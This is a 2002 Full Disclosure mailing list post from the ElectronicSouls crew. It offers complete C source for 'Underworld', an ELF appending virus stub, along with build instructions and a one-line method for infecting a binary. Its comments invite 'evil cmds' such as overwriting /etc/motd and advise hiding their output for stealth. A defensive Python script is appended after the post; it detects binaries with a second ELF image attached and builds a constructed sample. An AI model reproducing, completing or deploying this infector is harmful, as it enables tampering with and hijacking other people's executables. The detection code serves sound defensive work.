Full Disclosure mailing list archives
[ElectronicSouls] - Not One of Us Is Owned
From: es () hush com
Date: Fri, 29 Nov 2002 18:14:12 -0800
-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

As the title of this email suggests, no members of our crew are owned.

Please enjoy the code.

# cat 4553underworld.c
/*
-----------------------------------------------------------
[CONFIDENTIAL SOURCE MATERIAL OF THE ELECTRONIC-SOULS CREW]
------------------- DO NOT DISTRIBUTE ! -------------------
-----------------------------------------------------------
[Underworld] - append ELF infect0r (C) BrainStorm - 01-2002
-----------------------------------------------------------

Information :
+++++++++++++

This ELF Infector uses the appendage infection tekneeq!
that means to two Executeables are appended together.
It worx like that :

 _________________
|                 |  The Parasite Code is first, thats why
| [PARASITE CODE] |  it needs to know its own size.
|_________________|
|                 |  the host code stays untouched and gets
| [ORIGINAL CODE] |  extracted and executed from the virus.
|_________________|

-----------------------------------------------------------

to get it working :
+++++++++++++++++++

'gcc code.c -O2 -o code', then get the file size and change
the define in the code, now recompile and we are done ;)

-----------------------------------------------------------

to infect a binary :
++++++++++++++++++++

cat /bin/binary >> underworld

you get the point ...

-----------------------------------------------------------

special thanks to :
+++++++++++++++++++

ghQst and SectorX for making me interested in ELF infection
and for beeing there for me since back in the days =) !

shouts go out to all ElectronicSouls members - j00 r0ck =)

-----------------------------------------------------------
[ElectronicSouls] - keep the spirit alive !
-----------------------------------------------------------
*/

/* KUNG FOO ! */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PARASIZE 14985      /* dont forget to change me ! */
#define TEMP ".para.tmp"    /* tmp file */
#define KILL(X) exit(1)     /* what could this be ? */

int main(int argc, char *argv[], char *envp[])
{
    int input, output, lenght;
    char *dope;
    struct stat stat;

    printf("\n\n Welcome on the other side ;> \n 0x45 0x53 ! ph34r our krad tekneeqz !@# \n");

    /*
       [insert evil cmds here!]
       be sure to hide the output of external programs
       to be more stealth .. heh

       example: system("echo "did you know? i 0wn j00!" > /etc/motd");
       you get the point ;)
    */

    input = open("/proc/self/exe", O_RDONLY);
    if (input < 0) KILL("open(input)");
    if (fstat(input, &stat) < 0) KILL("fstat");

    lenght = stat.st_size - PARASIZE;
    dope = malloc(lenght);
    if (dope == NULL) KILL("malloc");

    if (lseek(input, PARASIZE, SEEK_SET) != PARASIZE) KILL("lseek(input)");
    if (read(input, dope, lenght) != lenght) KILL("read(input)");
    close(input);

    output = open(TEMP, O_RDWR | O_CREAT | O_TRUNC, stat.st_mode);
    if (output < 0) KILL("open(output)");
    if (write(output, dope, lenght) != lenght) KILL("write(output)");

    free(dope);
    close(output);

    exit(execve(TEMP, argv, envp));
}

/* quick and dirty, small but effective !@# */
/* im new into this so send flames to /dev/null wh0r3z ..show better code 1st ;) */

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"So Tired, We Have Insomnia"

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3oHwkMHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt9aYAoLF/hFJ55U7r
bAa57+3t/dUOt/iJAJ4kFQNfEdrP900U3IfMU1ZwssnAgw==
=BZRe
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
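
For triage: the layout described in the post (stub first, untouched host appended) leaves a second ELF header exactly where the first image's own headers say the file ends. The following is an added example, not part of the original post: a Python check for that trailing image. The names `declared_end`, `appended_elf_offset` and `make_stub` are chosen here, the sample ELF is constructed, and only little-endian ELF64 is handled.

```python
# Added example (not from the original post): flag a file in which a second
# ELF image starts exactly where the first image's headers say it ends.
import struct
import sys

ELF_MAGIC = b"\x7fELF"
EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, 64 bytes
PHDR = struct.Struct("<IIQQQQQQ")           # Elf64_Phdr, 56 bytes

def declared_end(data):
    """Highest file offset the ELF64 headers account for, or None."""
    if len(data) < EHDR.size or data[:4] != ELF_MAGIC or data[4:6] != b"\x02\x01":
        return None                          # not little-endian ELF64
    (_, _, _, _, _, phoff, shoff, _, _, phentsize, phnum,
     shentsize, shnum, _) = EHDR.unpack_from(data)
    end = EHDR.size
    if shoff:                                # section header table, usually last
        end = max(end, shoff + shnum * shentsize)
    for i in range(phnum):
        off = phoff + i * phentsize
        if off + PHDR.size > len(data):
            return None                      # truncated program header table
        _, _, p_offset, _, _, p_filesz, _, _ = PHDR.unpack_from(data, off)
        end = max(end, off + PHDR.size, p_offset + p_filesz)
    return end

def appended_elf_offset(data):
    """Offset of a second ELF image following the first, or None."""
    end = declared_end(data)
    if end is None or data[end:end + 4] != ELF_MAGIC:
        return None
    return end

def make_stub(payload=b""):
    """Constructed sample: ELF64 header plus one PT_LOAD covering the image."""
    size = EHDR.size + PHDR.size + len(payload)
    ident = ELF_MAGIC + bytes([2, 1, 1]) + bytes(9)
    ehdr = EHDR.pack(ident, 2, 62, 1, 0, EHDR.size, 0, 0,
                     EHDR.size, PHDR.size, 1, 0, 0, 0)
    phdr = PHDR.pack(1, 5, 0, 0x400000, 0x400000, size, size, 0x1000)
    return ehdr + phdr + payload

if __name__ == "__main__":
    for path in sys.argv[1:]:                # e.g. files under a bin directory
        with open(path, "rb") as f:
            print(path, appended_elf_offset(f.read()))
```

Self-extracting installers and some packers also carry trailing data, so a reported offset is a reason to inspect the file, not a verdict.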